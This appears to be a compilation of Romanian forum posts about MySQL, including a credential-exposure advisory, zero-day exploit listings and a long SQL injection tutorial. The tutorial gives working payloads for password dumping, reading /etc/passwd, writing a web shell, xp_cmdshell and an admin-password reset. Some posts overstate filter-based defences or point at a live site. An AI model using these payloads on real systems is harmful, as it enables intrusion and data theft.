  13. Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure Author: Larry W. Cashdollar, @_larry0 Date: 2015-02-17 Download Site: https://rubygems.org/gems/xaviershay-dm-rails Vendor: Martin Gamsjaeger, Dan Kubb Vendor Notified: 2015-02-17 Vendor Contact: notreal [at] rhnh.net Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically. Vulnerability: The problem is with the execute function exposing the user credentials to the process table. Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb: def execute(statement) system( 'mysql', (username.blank? ? '' : "--user=#{username}"), (password.blank? ? '' : "--password=#{password}"), '-e', statement ) end OSVDB:118579 Exploit Code: • $ while (true) do ps -ef |grep [p]assword; done Advisory: http://www.vapid.dhs.org/advisory.php?v=115 Source
  14. SC Online Advertising International SRL Angajeaza! Responsabilitati - Creatie publicitara - Creare si intretinere de site-uri web - Creare machete grafice in vederea tiparirii - Creare elemente de identitate vizuala (logo, identitate vizuala) - Creare layout-uri pentru site-uri web - Participarea la sedinte de Brainstorming - Program 8 ore / zi Cerinte - GRAFICA: Adobe Photoshop - PROGRAMARE: PHP, HTML, CSS, MySQL -Dezvoltare/implementare teme responsive, widget-uri, plugin-uri si shortcod-uri WordPress, Joomla, Opencart - Creativitate - Talent grafic - Experienta 2-3 ani Salariu: 400-750 euro CV si informatii la florentina.savecash@gmail.com
  15. Salutare baieti, Var rog sa ma ajutati si pe mine daca este posibil cu niste tutoriale cu MySQL/Data Studio si DB2 Express cat se poate de "simplute" pe tema Baze de Date. Urmeaza sa am un examen la facultate si vreau sa fiu cat de cat pregatit! Multam!
  16. Php and mysql can even say .. not taught. In general, need a simple script ... For example in column 1 has the words "home" and "school" ... In the 2nd column values ??5 ... If you enter the word "school" is coming out if "house" Total of these "words" will be very much and sometimes 1 word will show 20 extra. words (and maybe more). It is desirable to be able to add "extra word." Or * extra. * word to the "word" .. Add a "word" - you can not, though, I'll just add, and this is not very important ... P.S. google translate
  17. Salut . M? numesc Alexandru(to?i îmi spun alex sau calu[sunt prea inalt] dar anyway. Am 15 ani ?i sunt din Rm.Vâlcea ( Ora?ul hackerilor ). Momentan sunt în clasa a 8-a la ?coal? . M? aflu aici pentru a descoperii "arta" hackingului ca s? spun a?a . P.S: Numele indic? ce o s? ias? din acest "cont" ?i din ce o s? înv?? aici . Ce vreau s? fac? A? vrea s? înv?? cum s? lucrez în backtrack 5.Mai pe scurt s? înv?? cum s? descop?r vulnerabilit??ile unui site ?i s? le pot exploata pentru a-mi atinge scopul . Dac? îmi pute?i spune cu ce s? încep sau ce s? înv?? a? fi recunosc?tor . Mul?umesc . Baft?
  18. Inspirat de Dan Kaminsky, vreau s? v? prezint o metod? eficient?, simpl? ?i sigur? de protejarea aplica?iilor web împotriva vulnerabilit??ilor de tip MySQL injection. Tot de ce ave?i nevoie, este s? folosi?i urm?torul fragment de cod: array_walk_recursive($_GET, function (&$val, $key) { if (!is_numeric($val)) { $val = '0x' . bin2hex($val); } }); Dup? care, pute?i folosi orice variabil? din masivul $_GET f?r? a v? gândi la securizarea acesteia. De exemplu, urm?toarea instruc?iune SQL este complet sigur? ?i nu are nici o importan?? ce date con?ine variabila $_GET['name']: $sql = "SELECT * FROM users WHERE name={$_GET['name']}"; Spre deosebire de metoda lui Dan Kaminsky, în cazul dat, performan?a bazei de date nu va avea de suferit, iar ceea ce prive?te PHP — func?ia bin2hex() e mai rapid? chiar ?i ca mysqli_escape_string() — astfel, la capitolul performan??, totul e minunat. Totu?i, în dependen?? de aplica?ie ?i cerin?ele ei, vei fi nevoit s? schimbi corespunz?tor fragmentul de cod ar?tat mai sus. Cel mai corect ar fi ca s? creezi o nou? variabil? unde s? p?strezi datele ce le vei folosi la crearea interog?rilor SQL. De exemplu, putem crea urm?toarea func?ie: function hex_secure($vars) { array_walk_recursive($vars, function (&$val, $key) { if (!is_numeric($val)) { $val = '0x' . bin2hex($val); } }); return $vars; } ?i o folosim în modul urm?tor: $vars = hex_secure($_GET); $sql = "SELECT * FROM users WHERE name={$vars['name']}";
  19. Daca utilizati SSD-uri, este o idee buna sa inlocuiti MySQL cu Percona. Veti fi uimit de castigul de performanta. Chiar si cu HDD-uri obisnuite, o sa aveti un castig de 10-30 % in performanta. Adaugam repo-urile in '/etc/apt/sources.list' echo "deb http://repo.percona.com/apt wheezy main" >> /etc/apt/sources.list echo "deb-src http://repo.percona.com/apt wheezy main" >> /etc/apt/sources.list Adaugam key-ul pentru apt apt-key adv --keyserver keys.gnupg.net --recv-keys 1C4CBDCDCD2EFD2A Facem un apt-get update pentru o lista cu pachetele actualizate apt-get update Instalam percona server, percona client si common files (fisiere de configuratie, etc) apt-get install percona-server-common-5.5 percona-server-client-5.5 percona-server-server-5.5 Un config se poate vedea aici # File '/etc/mysql/my.cnf' [client] port = 3306 socket = /var/run/mysqld/mysqld.sock [mysqld_safe] socket = /var/run/mysqld/mysqld.sock nice = 0 [mysqld] user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /run/shm lc-messages-dir = /usr/share/mysql skip-external-locking bind-address = 127.0.0.1 key_buffer = 600M max_allowed_packet = 1200M open_files_limit = 4096 thread_stack = 192K thread_cache_size = 8 myisam-recover = BACKUP max_connections = 1000 max_user_connections = 100 table_cache = 512 thread_concurrency = 2 query_cache_limit = 128M query_cache_size = 16M log_slow_queries = /var/log/mysql/mysql-slow.log long_query_time = 2 expire_logs_days = 10 max_binlog_size = 100M [mysqldump] quick quote-names max_allowed_packet = 1200M [mysql] [isamchk] key_buffer = 16M # # * IMPORTANT: Additional settings that can override those from this file! # The files must end with '.cnf', otherwise they'll be ignored. # !includedir /etc/mysql/conf.d/ Nota: configul este doar ca exemplu, nu-i dati copy/paste in sistemele voastre fara sa stiti cu exactitate ce fac acele variabile. Ele sunt calculate in in functie de resurse si aplicatii. Pagina oficiala percona: http://www.percona.com/ Documentatie: http://www.percona.com/docs/wiki/
  20. Rasfoind portaluri pe care BOR le promoveaza fara SEO am gasit asta http://www.icoaneortodoxe.com.ro/php/image.php?image_id=2078 si ghiciti ce?
  21. MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day > MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day MySQL Remote Preauth User Enumeration Zeroday > MySQL Remote Preauth User Enumeration Zeroday MySQL Denial of Service Zeroday PoC > MySQL Denial of Service Zeroday PoC MySQL (Linux) Database Privilege Elevation Zeroday Exploit > MySQL (Linux) Database Privilege Elevation Zeroday Exploit MySQL (Linux) Heap Based Overrun PoC Zeroday > MySQL (Linux) Heap Based Overrun PoC Zeroday http://www.exploit-db.com/exploits/23075/ > MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) > MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) Vulnerabilitatiile au fost publicate pe 1 dec, iar incepand cu 2 dec au aparut POC-urile. Atentie mare tot sysadmini, faceti update la mysql au aparut patchuri deja, sau provizoriu blocati portul.
  22. http://mytest-php.web44.net/ Nu stiu cat de posibil e sqlI pe acest website. Vreau sa invat mai multe despre php & sql si as fi foarte recunoscator sa lasati o mica explicatie despre: cat de vul e?; de ce?; ce trebuie modificat?;
  23. Introducere Se stie ca astazi majoritatea aplicatiilor-web îsi pastreaza datele în baza de date, deoarece acest fapt permite de a genera dinamic pagini. Aplicatia-web primeste de la utilizatori date, ulterior aceste date sunt folosite de aplicatie/script pentru generarea unei cereri la baza de date. Evident ca în majoritatea cazurilor pentru a genera cereri la baza de date se utilizeaza limbajul SQL (Structured Query Language). SQL Injection este o vulnerabilitate ce apare în cazurile cînd datele primite de la utilizatori nu se prelucreaza corect. Ca consecinta – raufacatorul potential poate schimba cererea la baza de date, asfel fiind posibil furtul datelor private. Aceasta lucrare reflecta tehnicile simple si avansate ce sunt folosite de raufacatori în procesul de exploatare a vulnerabilitatii SQL Injection. Aceste tehnici demonstreaza cum pot fi cu usurinta obtinut continutul bazelor de date, datele private, realizarea atacului DoS, obtinerea privilegiilor maxime etc. Lucrarea e un studiu care este în primul rînd destinat web-programmerilor si expertilor în securitate, pentru a-i atrage atentia la seriozitatea si actualitatea temei abordate. În lucrare ma voi referi mai mul la aplicatiile ce lucreaza cu SGBD MySQL, MS SQL Server, Oracle deoarece acestea sunt cele mai raspîndite. Aceasta nu înseamna ca celelalte SGBD sunt mai securizate. 1. Bazele SQL-injection Pentru a întelege materialul de mai jos este nevoie de a cunoaste cel putin bazele limbajului de interogare SQL si realizarea lucrului cu bazele de date în PHP/ASP. Sa presupunem ca avem o baza de date ce contine relatia (tabelul) users de urmatoarea structura: O interogare ce extrage datele din baza de date poate avea forma: SELECT * FROM users WHERE name = '$name' În acest caz valorile din cîmpul “name” sunt comparate cu valoarea variabilei “$name”. Daca valoarea aceastei variabile a fost obtinuta din parametrii URL sau cookie si nu se prelucreaza la simboluri speciale atunci interogarea la baza de date este vulnerabila. Voi aduce un exemplu simplu cum raufacatorul poate modifica interogarea. Daca variabila $name primeste valoarea su, atunci cerea la baza de date va fi urmatoarea: SELECT * FROM users WHERE name = 'su' Interogarea este corecta. Însa daca valoarea variabilei va primi valoarea aaa' interogarea va deveni incorecta din punct de vedere sintactic, deoarece este prezent un simbol ' în plus: SELECT * FROM users WHERE name = 'aaa'' Simbolul ' permite de a modifica cererea la baza de date, si nu este unicul simbol ce permite acest lucru (dupa cum veti vedea mai jos). Sa presupunem ca cerea de mai sus o foloseste o aplicatie web pentru a afisa datele private a utilizatorului curent logat. Utilizînd simbolul ' raufacatorul cu usurinta poate vedea datele private a tuturor utilizatorilor înregistrati, transmitînd una din urmatoarele valori pentru parametrul $name (presupunem ca în sistem sunt înregistrati utilizatorii admin, su si lma0): random_data' OR name='admin random_data' OR name='su random_data' OR name='lma0 Cererile SQL la baza de date vor fi: SELECT * FROM users WHERE name='random_data' OR name='admin' SELECT * FROM users WHERE name='random_data' OR name='su' SELECT * FROM users WHERE name='random_data' OR name='lma0' Înjectarea permite de a extrage datele private a unui utilizator. Raufacatorul la dorinta poate sa obtina datele despre toti utilizatorii transmitind parametrului $name valoarea: random_data' OR '1'='1 Cererea cu codul injectat: SELECT * FROM users WHERE name='random_data' OR '1'='1' va întoarce toate tuplurile (înregistrarile) din tabelul users. 2. Proceduri de testare a aplicatiilor web la SQL-injection Procedurile de testare a aplicatiilor web la SQL-injection se reduc la formarea unei liste de parametri cu care lucreaza aplicatia (atît parametrii GET cît si POST), incluzînd si parametrii cookie. Apoi acesti parametri se testeaza individual la prelucrarea simbolurilor speciale sau a cuvintelor cheie (de genul WHERE) care ar ajuta la exploatarea vulnerabilitatii. 2.1. Identificarea parametrilor vulnerabili Sa presupunem ca aplicatia-web este configurata astfel, încît în cazul aparitiei unei erori SQL, în browser va apare textul erorii si posibil o portiune din interogare. Daca raufacatorului i se afiseaza chiar si o portiune de interogare, injectarea codului SQL malicios nu va fi o problema. Presupunem ca aplicatiei-web i s-a transmis un parametru GET id=aaa': http://127.0.0.1/inj.asp?id=aaa' Pentru a determina daca parametrul este vulnerabil este nevoie de a cauta în pagina returnata de server a frazelor de genul “ODBC”, “have an error”, “SQL syntax”, “SQL Server”, “MySQL”, “Oracle” etc. Exista cazuri cînd erorile returnate de server se plaseaza în parametrii ascunsi (hidden input, headers) sau comentarii. În acest caz raufacatorului îi este foarte usor de a injecta un cod SQL malicios: http://127.0.0.1/inj.asp?id=aaa';+drop+table+users;-- Ar trebui de mentionat ca nu toate SGBD permit concatenarea interogarilor la baza de date. Este foarte raspîndita situatia, cînd din textul erorii returnate de server poate fi aflat tipul bazei de date pe care o foloseste aplicatia-web: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in ... Textul erorii de mai sus este foarte util raufacatorului la formarea codului SQL malicios specific unui tip de SGBD. 2.2. Identificarea parametrilor vulnerabili în cazurile cînd nu se afiseaza erorile Sa presupunem ca erorile ce apar în cazurile cererilor la baza de date nu se afiseaza. Atunci raufacatorului îi ramine posibilitatea de a determina prezenta vulnerabilitatii dupa comportamentul aplicatiei-web. Cu o mare probabilitate se poate de spus ca parametrul este vulnerabil cînd serverul returneaza erorile 302 (page redirect) si 500 (internal server error). În acest caz raufacatorul va utiliza unele tehnici mai avansate. Pentru a le întelege este nevoie de a cunoaste tipurile de baza SQL. Atributele în SQL pot avea unul din cele 3 tipuri de baza: numerici, sir de caractere sau datetime. Fiecare tip are caracteristicile sale specifice care pot ajuta raufacatorul în procesul de exploatare a vulnerabilitatii. În SQL parametrii numerici se transmit asa cum sunt, iar sirurile de caractere si valorile datetime sunt transmise între ghilimele (unele SGBD permit transmiterea si a valorilor numerice între ghilimele): SELECT * FROM users WHERE id=5 /* valoare numerica */ SELECT * FROM users WHERE name='admin' /* valoare sir de caractere*/ Testarea la SQL Injection a parametrilor numerici este foarte simpla. Voi aduce un exemplu cu 2 cazuri posibile: http://127.0.0.1/inj.php?id=5' http://127.0.0.1/inj.php?id=6-1 http://127.0.0.1/inj.php?id=4+1 Daca parametrul id este vulnerabil în primul caz va fi generata o eroare SQL (sau o exceptie: error 302, 500 – cînd erorile SGBD nu se afiseaza) deoarece cererea: /* 1 */ SELECT * FROM users WHERE id=5' nu este corecta din punct de vedere sintactic. Cererile 2a si 2b: /* 2a */ SELECT * FROM users WHERE id=6-1 /* 2b */ SELECT * FROM users WHERE id=4+1 se for executa corect si vor da ambele acelasi rezultat (vor extrage tuplul din baza de date cu valoarea variabilei id=5), indicînd la 100% ca parametrul numeric id este vulnerabil. O tehnica similara se foloseste la testarea parametrilor sir caractere cu exceptia unor diferente: valorile parametrilor se transmit între ghilimele si concatenarea sirurilor de caractere în diferite SGBD este realizata diferit (MySQL si MSSQL Server foloseste semnul +, iar Oracle – semnul ||). Caracteristicele specifice a unor sau altor SGBD vor fi expuse mai jos. Procedura de testare a parametrului name: http://127.0.0.1/inj.php?name=lma0 are deasemenea 2 cazuri posibile. În primul caz se parametrului i se transmite o valoare care o sa genereze eroare SQL: http://127.0.0.1/inj.php?name=lm'a0 Cererea SQL ce va genera eroare: /* 1 */ SELECT * FROM users WHERE name='lm'a0' deoarece este prezent un simbol ' în plus. Într-al doilea caz parametrului i se transmite o valoare ce ar indica vulnerabilitatea acestuia: http://127.0.0.1/inj.php?name=l'+'ma0 http://127.0.0.1/inj.php?name=lm'+'a0 Ca rezultat vor fi formate urmatoarele cereri la baza de date: /* 2a */ SELECT * FROM users WHERE name='l'+'ma0' /* 2b */ SELECT * FROM users WHERE name='lm'+'a0' Ambele cereri SQL sunt corecte si returneaza acelasi rezultat. 2.3. Parametrii vulnerabili în cookie Dupa sum se stie aplicatia-web primeste de la utilizatori date nu numai din cereri GET si POST dar si din cookies. Majoritatea programmerilor-web nici nu presupun ca parametrii primiti din cookies deasemenea pot fi vulnerabili. Voi arata un exemplu pe baza portalului PHP-Nuke versiunea 7.0 care dupa cum se stie este vulnerabil la SQL injection – nu se filtreaza datele din cookie. Nu voi intra în detalii, doar voi mentiona ca în PHP Nuke, în cookies se pastreaza un sir de caractere de forma base64_encode(login:md5(pass)). Iata o portiune din cookies: ... * admin YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6 127.0.0.1/phpnuke/ admin YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6 127.0.0.1/phpnuke/ admin YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6 127.0.0.1/phpnuke/ admin YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6 127.0.0.1/phpnuke/ admin YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6 127.0.0.1/phpnuke/ ... Sirul de caractere este codificat în base64: YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6 Decodificat va fi: admin:96e79218965eb72c92a549dd5a330112: Unde admin – login, 96e79218965eb72c92a549dd5a330112 – md5(pass) (functia hash md5 a parolei), simbolul : este auxiliar. Voi expune o portiune din cod a fisierului de autorizare a utilizatorilor auth.php: ... f(isset($admin) && $admin != "") { // daca exista variabila $admin $admin = base64_decode($admin); // se decodeaza din base64 (din cookie) $admin = explode(":", $admin); // se imparte sirul in pina si dupa “:” $aid = "$admin[0]"; // login-ul $pwd = "$admin[1]"; // md5(parola) – md5 hash din cookie ... $sql = "SELECT pwd FROM ".$prefix."_authors WHERE aid='$aid'"; // !!! ... Dupa cum se observa variabila $aid primita din cookie nu se prelucreaza la simboluri speciale si este vulnerabila. Astfel raufacatorul cu usurinta poate modifica cookies. Plasînd în locul sirului de caractere: caractere: YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6 sirul: YWRtaW4nOyB1cGRhdGUgbnVrZV9hdXRob3JzIFNFVCBwd 2Q9J2M5ODY5ZGQwNDA3MTc4ZjQxZjBlMmE1NGQxMGI4Nzc1 JyBXSEVSRSBhaWQ9J2FkbWluOjk2ZTc5MjE4OTY1ZWI3MmM5Mm E1NDlkZDVhMzMwMTEyOg== Decodificat ca fi: admin'; update nuke_authors SET pwd='c9869dd0407178f41f0e2a54d10b8775' WHERE aid='admin:96e79218965eb72c92a549dd5a330112: Unde c9869dd0407178f41f0e2a54d10b8775 este functia hash md5 a parolei ‘hacked_password’. Efectul actiunii date – schimbarea parolei administratorului. 3. Metode de atac Sa presupunem ca raufacatorul a gasit un parametru vulnerabil. Pentru a exploata vulnerablitatea raufacatorul ar trebui aproximativ sa cunoasca tipul cererii SQL în care va fi injectat codul malicios. Cel mai des în aplicatiile-web sunt utilizate 4 tipuri de cereri SQL: 1. SELECT 2. INSERT 3. UPDATE 4. DELETE Care dintre acestea este folosit într-un caz concret, poate fi determinat analizînd logica si semantica scriptului vulnerabil. Daca scriptul afiseaza date ce corespund unui identificator anumit, atunci cu o mare probabilitate cererea este de tipul SELECT. Daca scriptul adauga unele date în baza de date, spre exemplu adaugarea unui comentariu, sau un post în forum – cererea este de tipul INSERT. Daca scriptul modifica informatia, spre exemplu schimbarea parolei, redactarea postului în forum – cererea este de tipul UPDATE. Daca are loc stergerea informatiei, spre exemplu anularea accountului, posibil ca cererea este sau de tipul DELETE sau de tipul UPDATE. Cel mai des sunt întîlnite vulnerabilitati în cereri SELECT. 3.1. Injectarea UNION SELECT Deoarece cel mai des vulnerabile sunt cererile la baza de date de tipul select, raufacatorii în primul rînd vor încerca de a injecta clauze UNION SELECT, deoarece în caz de succes raufacatorul va obtine acces la toate tabelele de sistem. În aceste tabele se contine informatia despre structura tuturor bazelor de date de pe server. Mai jos este prezentata lista tabelelor de sistem pentru diferite SGBD: 1. MS SQL Server INFORMATION_SCHEMA sysobjects syscolumns 2. MySQL mysql.user mysql.host mysql.db 3. Oracle SYS.USER_OBJECTS SYS.USER_TABLES SYS.USER_VIEWS SYS.USER_TAB_COLUMNS SYS.TAB SYS.ALL_TABLES Înainte de a efectua injectarea UNION SELECT raufacatorul ar trebui sa afle numarul de atribute în cererea SQL, tipul fiecarui atribut si denumirea unor tabele de sistem ceea ce se considera greu de realizat în cazurile cînd nu se afiseaza erorile în browser. Mai jos este demonstrat ca exista unele tehnici simple care ar solutiona problemele date. Cererea UNION SELECT trebuie sa contina acelasi numar de atribute, iar atributele trebuie sa fie de acelasi tip. 3.1.1. Identificarea numarului de atribute Mai întîi voi arata cît de simplu se afla numarul de atribute în cazul cînd se afiseaza erorile în browser. Sa presupunem ca exista urmatoarea vulnerabilitate în aplicatia-web ce utilizeaza SGBD MySQL: http://127.0.0.1/inj.php?id=5' Pentru a afla numarul de atribute raufacatorul va forma cererile: http://127.0.0.1/inj.php?id=-1'+UNION+SELECT+0/* http://127.0.0.1/inj.php?id=-1'+UNION+SELECT+0,1/* http://127.0.0.1/inj.php?id=-1'+UNION+SELECT+0,1,2/* http://127.0.0.1/inj.php?id=-1'+UNION+SELECT+0,1,2,3/* ... pîna ce va disparea mesajul de eroare: The used SELECT statements have a different number of columns Logurile MySQL: mysql> select * from users where id=-1 union select 0; ERROR 1218: The used SELECT statements have a different number of columns mysql> select * from users where id=-1 union select 0,1; ERROR 1218: The used SELECT statements have a different number of columns mysql> select * from users where id=-1 union select 0,1,2; ERROR 1218: The used SELECT statements have a different number of columns mysql> select * from users where id=-1 union select 0,1,2,3; ERROR 1218: The used SELECT statements have a different number of columns mysql> select * from users where id=-1 union select 0,1,2,3,4; ERROR 1218: The used SELECT statements have a different number of columns mysql> select * from users where id=-1 union select 0,1,2,3,4,5; +----+------+--------+----------+-------+------------+ | id | name | mgroup | password | email | ip_address | +----+------+--------+----------+-------+------------+ | 0 | 1 | 2 | 3 | 4 | 5 | +----+------+--------+----------+-------+------------+ 1 row in set (0.00 sec) În cazul cînd erorile cererii SQL nu se afiseaza în browser raufacatorul se va folosi de clauza ORDER BY pîna ce va aparea un mesaj de eroare: http://127.0.0.1/inj.php?id=-1+ORDER+BY+1/* http://127.0.0.1/inj.php?id=-1+ORDER+BY+2/* http://127.0.0.1/inj.php?id=-1+ORDER+BY+3/* ... Logurile MySQL: mysql> select * from users where id=-1 order by 1; Empty set (0.01 sec) mysql> select * from users where id=-1 order by 2; Empty set (0.00 sec) mysql> select * from users where id=-1 order by 3; Empty set (0.00 sec) mysql> select * from users where id=-1 order by 4; Empty set (0.00 sec) mysql> select * from users where id=-1 order by 5; Empty set (0.00 sec) mysql> select * from users where id=-1 order by 6; Empty set (0.00 sec) mysql> select * from users where id=-1 order by 7; ERROR 1054: Unknown column '7' in 'order clause' Deoarece o cerere de tip SELECT are cel putin un atribut, aceasta tehnica este foarte efectiva. Raufacatorul incrementeaza numarul coloanei dupa care se face sortarea si cînd aplicatia-web întoarce o eroare (302 – page redirect sau 500 – internal server error) numarul exact coloanelor se stie. 3.1.2. Identificarea tipului atributelor Dupa ce se cunoaste numarul de atribute, mai ramîne de aflat tipul acestora. În MySQL tipul datelor este foarte usor de determnat deoarece valorile numerice pot fi considerate si ca valori sir de caractere. Însa cînd se folosesc SGBD MS SQL Server sau Oracle deseori pentru a solutiona problema data se utilizeaza cuvîntul rezervat NULL, deoarece acesta poate avea orice tip. Presupunînd ca numarul de atribute este calculat, raufacatorului îi este foarte usor de a înjecta clauza UNION cu toate atributele nule. Adaugarea înstructiunii WHERE care întotdeauna va fi evaluata ca falsa garanteaza eliminarea erorilor (unele aplicatii pot sa nu prelucreze valorile NULL). Voi aduce un exemplu pentru SGBD MS SQL Server (ceea ce este similar cu SGBD Oracle): http://127.0.0.1/inj.asp?id=-1' +UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL+WHERE+1=2-- Acest tip de injectare cu NULL are 2 scopuri. Principalul – de a obtine o cerere cu UNION fara erori. Si cealalta – aceasta cerere nu returneaza nimic, ceea ce dovedeste ca totul lucreaza corect. Odata ce este formata cererea procesul de identificare a tipurilor atributelor devine trivial. Într-o iteratie fiecarui atribut se dau valori numerice, sir de caractere sau datetime. -1'+UNION+SELECT+1,NULL,NULL,NULL,NULL,NULL+WHERE+1=2— Nici o eroare – primul atribut este numeric -1'+UNION+SELECT+1,2,NULL,NULL,NULL,NULL+WHERE+1=2— Eroare -1'+UNION+SELECT+1,’2’,NULL,NULL,NULL,NULL+WHERE+1=2— Nici o eroare – al doilea atribut are tipul sir caractere -1'+UNION+SELECT+1,’2’,3,NULL,NULL,NULL+WHERE+1=2— Nici o eroare – al 3-lea atribut este numeric ... Astfel, avînd toata înformatia, datele din tabelele de sistem pot fi obtinute cu succes. Un exemplu de obtinere a datelor din SGBD MySQL: mysql> select * from users where id=-1 union select 0,1,2,mysql.user.password,4,5 from mysql.user; +----+------+--------+----------+-------+------------+ | id | name | mgroup | password | email | ip_address | +----+------+--------+----------+-------+------------+ | 0 | 1 | 2 | fdsJD83h | 4 | 5 | +----+------+--------+----------+-------+------------+ 1 row in set (0.00 sec) 3.2. Obtinerea unui interpretator de comenzi Unele SGBD permit extragerea rezultatelor cererii SQL într-un fisier. Acest lucru permite raufacatorilor de a forma un script care ulterior va fi util pentru controlul total al serverului (spre exemplu un php sau asp shell). În MySQL extragerea rezultatelor în fisier se face utilizînd clauza INTO OUTFILE. Un exemplu simplu ar fi urmatorul: INSERT '<? system($cmd) ?>' INTO OUTFILE /tmp/shell.php În MS SQL Server extragerea rezultatelor în fisier putin difera. În componenta cu serverul sunt unele module ce contin proceduri ce usureaza lucrul cu serverul si care pot fi apelate direct din cererea SQL. Una din aceste proceduri – master.dbo.sp_makewebtask – are destinatia aceasta. O alta metoda de a executa comenzi de sistem pe serverul pe care este instalat SGBD MS SQL Server este utilizarea procedurii master.dbo.xp_cmdshell. Un exemplu de cerere SQL: EXEC master.dbo.xp_cmdshell 'cmd.exe dir' 3.3. Metode specifice de atac asupra unui anumit tip de SGBD 3.3.1. MySQL SQL injecion permite de a afla si alte date: /* baza de date curenta */ select * from users where id=-1 UNION SELECT 0,1,2,3,4,DATABASE(); /* utilizatorul care a lansat baza de date */ select * from users where id=-1 UNION SELECT 0,1,2,3,4,USER(); /* versiunea serverului */ select * from users where id=-1 UNION SELECT 0,1,2,3,4,VERSION(); Daca utilizatorul care a lansat SGBD are drepturi file_priv, atunci raufacatorul poate obtine continutul oricarui fisier de pe server: http://127.0.0.1/inj.php?id=-1'+UNION+SELECT+0,1,2,3,4,5, LOAD_FILE('/etc/passwd')/* O alta metoda de exploatare a vulnerabilitatii este utilizarea functiei char(num) care reîntoarce simbolul cu codul ASCII num: select * from users where id=9999 union select 0,1,2,char(109,121,115,113,108,46,117,115,101,114,46,112,97,115,115,119,111,114,100),4,5 from mysql.user ceea ce este echivalent cu: select * from users where id=9999 union select 0,1,2,mysql.user.password,4,5 from mysql.user Vulnerabilitatea SQL injection poate fi exploatata si pentru realizarea atacului DoS: select * from users where id= BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) trimiterea de catre raufacator a cîteva cereri de acest fel va face serverul sa frîneze considerabil. 3.3.2. MS SQL Server In baza de date de sistem INFORMATION_SCHEMA se contine informatia despre toate tabelele de pe server. Extragerea datelor din baza de date poate fi cu usurinta facuta în cazul cînd mesajele de erori ODBC se afiseaza în browser. Sa presupunem ca exista o aplicatie-web vulnerabila: http://127.0.0.1/?page_id=1’ Pentru început raufacatorul va afla denumirile tabelelor din baza de date, astfel va fi formata o cerere SQL malicioasa care ar extrage numele primului tabel: http://127.0.0.1/?page_id=-1’; SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES-- Serverul va reîntoarce: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'table1' to a column of data type smallint Denumirea primului tabel din baza de date este table1. Apoi pentru a afla denumirile celorlalte tabele raufacatorul pe rînd va forma urmatoarele cereri: http://127.0.0.1/?page_id=-1’; SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table1')— Raspunsul serverului: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'table2' to a column of data type smallint Cererea urmatoare va fi: http://127.0.0.1/?page_id=-1’; SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table1','table2')— Acest exemplu demonstreaza cît de folositoare de dovedesc a fi mesajele de eroare returnate de server pentru raufacator. 4. Caracteristici tipice a SGBD 4.1. MySQL 1. Suporta INTO OUTFILE 2. Majoritatea modulelor si bibliotecilor nu permit executarea cererilor multiple la baza de date 3. Suporta interogari UNION si JOIN (doar versiunile > =4.0) 4. Permite transmiterea valorilor numerice între ghilimele 4.2. Oracle 1. Suporta subselect 2. Suporta UNION 3. Nu permite executarea cererilor multiple la baza de date 4. Simbolul || se foloseste pentru concatenarea sirurilor de caractere 4.3. MS SQL 1. Suporta subselect 2. Suporta UNION 3. Permite executarea cererilor multiple la baza de date 4. Simbolul + se foloseste pentru concatenarea sirurilor de caractere 5. Metode de aparare Pentru a evita o posibila exploatare a vulnerabilitatii SQL Injection în aplicatia web, este necesar de a prelucra toate datele ce parvin de la utilizatori la urmatoarele simboluri: 1) Ghilimelele atit simple cît si duble (‘, “, `). Cu ajutorul acestora în majoritatea cazurilor se efectuiaza injectarea codului SQL. 2) Simbolurile de comentarii specifice SGBD anumit (/*,--). Cu ajutorul acestora poate fi omisa o parte din interogare. 3) Simbolurile ce împart instructiunile SQL (. Prezenta acestui simbol permite de a forma mai multe cereri la baza de date. 4) Deasemenea datele ar trebui sa fie verificate la prezenta si la alte simboluri (_,%,*). 5) În cazul cînd în cererea SQL se utilizeaza date numerice primite de la utilizatori, înainte de a le plasa în cererea SQL acestea ar trebui aduse la tipul numeric: $id=(int)$id; 6) În cazul cînd în cererea SQL se utilizeaza date de tip sir de caractere primite de la utilizatori, înainte de a le plasa în cererea SQL acestea ar trebui prelucrate la simboluri speciale. Cea mai buna practica – este formarea expresiilor regulate. Concluzii Trebuie de mentionat ca vulnerabilitatile de tipul SQL Injection sunt foarte raspîndite. În lucrare am demonstrat ca prezenta vulnerabilitatii date în aplicatia-web îi permite raufacatorului sa afle/extraga informatii despre server, sa obtina un interpretator de comenzi sau chiar sa realizeze un atac DoS. Pentru a evita prezenta acestei vulnerabilitati este nevoie de a prelucra la simboluri speciale absolut 